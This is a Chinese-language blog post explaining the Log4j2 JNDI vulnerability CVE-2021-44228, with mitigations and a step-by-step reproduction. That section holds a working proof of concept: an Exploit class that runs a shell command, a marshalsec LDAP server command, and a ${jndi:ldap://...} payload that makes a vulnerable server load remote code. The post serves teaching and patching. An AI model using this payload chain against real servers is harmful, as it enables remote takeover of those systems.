网站LOGO
逐暗者的麦田
页面加载中
3月19日
网站LOGO 逐暗者的麦田
一个java软件攻城狮
菜单
  • 逐暗者的麦田
    一个java软件攻城狮
    用户的头像
    首次访问
    上次留言
    累计留言
    我的等级
    我的角色
    打赏二维码
    打赏博主
    LOG4J2史诗级漏洞
    点击复制本页信息
    微信扫一扫
    文章二维码
    文章图片 文章标题
    创建时间
  • 一 言
    确认删除此评论么? 确认
  • 本弹窗介绍内容来自,本网站不对其中内容负责。
    按住ctrl可打开默认菜单

    LOG4J2史诗级漏洞

    shellingford · 原创 ·
    程序人生 · javaBUG漏洞
    共 2236 字 · 约 2 分钟 · 278
    本文最后更新于2023年08月05日,已经过了227天没有更新,若内容或图片失效,请留言反馈

    log4j2史诗级漏洞

    背景

    12月9日晚,Apache Log4j2被曝出一个高危漏洞CVE-2021-44228,攻击者只需要输入一段代码,就可以控制受害者服务器,利用门槛极低。
    目前Log4j 团队已注意到一个安全漏洞 CVE-2021-44228,该漏洞已在 Log4j 2.15.0 中得到解决。

    漏洞基本信息

    受影响的版本为Log4j2.X < 2.15.0

    修复方式
    • 方法一:升级Log4j2的版本至2.15.0
    • 方法二:在版本> = 2.10,设置系统属性log4j2.formatMsgNoLookups=true或环境变量LOG4J_FORMAT_MSG_NO_LOOKUPS=true。对于 >=2.7 和 <=2.14.1 的版本,PatternLayout可以修改所有模式以将消息转换器指定为 ,%m{nolookups}而不仅仅是%m。对于> = 2.0-beta9和<= 2.10.0,方法是去除JndiLookup类:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
    • 方法三:禁止服务器访问外网

    漏洞原理

    java在部分低版本时允许通过rmi、LDAP-JNDI注入一些不属于本JVM中的类,并运行。log4j2的PatternLayout中的format调用了lookup,并且没有检查是否是本地协议,从而导致出现了问题。

    复现漏洞

    1. 建立一个使用log4j2的项目,版本可以设置为小于2.15.0的版本,可以使用2.9.0 。
    2. 新建一个恶意文件Exploit ,这里主要是启动macos中的计算器,用于演示可以控制jvm所在主机。

      java 代码:
      import java.io.IOException;
      import java.io.Serializable;
      import java.util.Hashtable;
      import javax.naming.Context;
      import javax.naming.Name;
      import javax.naming.spi.ObjectFactory;
      
      public class Exploit implements ObjectFactory, Serializable {
       public Exploit(){
           try{
               Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
           }catch (IOException e){
               e.printStackTrace();
           }
      
       }
      
       public static void main(String[] args){
           Exploit exploit = new Exploit();
       }
       @Override
       public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
           return null;
       }
      }
      
    3. 使用jdk8(尽量使用低版本)编译这个java文件,然后找个(非目标)服务器放上去。尽量使用低版本是为了防止目标服务器jre版本过低导致高版本编译的class无法在低版本jvm上运行。
    4. 构建一个jndi服务器,用于传输这个class文件,推荐使用marshalsec。

      java 代码:
      java -cp /data/javaapp/ldap/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ldap.shellingford.cn/#Exploit 6666
    5. 启动demo程序,写入日志即可。

      java 代码:
      public static void main(String[] args) {
           logger.error(System.getProperty("java.version"));
           logger.error("${jndi:ldap://23.95.230.154:6666/a}");
       }

    效果图:

    如果没有效果就需要检查运行的jvm版本了,对照上面的图,在部分jdk版本以上,修复了ldap-jndi注入。

    声明:本文由 shellingford(博主)原创,依据 CC-BY-NC-SA 4.0 许可协议 授权,转载请注明出处。

    还没有人喜爱这篇文章呢

    发一条! 发一条!
    博客logo 逐暗者的麦田 一个java软件攻城狮
    MOEICP 萌ICP备20237379号 ICP 沪ICP备13037081号-2,沪ICP备13037081号-1,沪ICP备13037081号-3 又拍云 本站由又拍云提供CDN加速/云存储服务

    🕛

    本站已运行 2 年 206 天 8 小时 5 分

    🌳

    自豪地使用 Typecho 建站,并搭配 MyLife 主题
    逐暗者的麦田. © 2021 ~ 2024.
    网站logo

    逐暗者的麦田 一个java软件攻城狮
     
     
     
     
    壁纸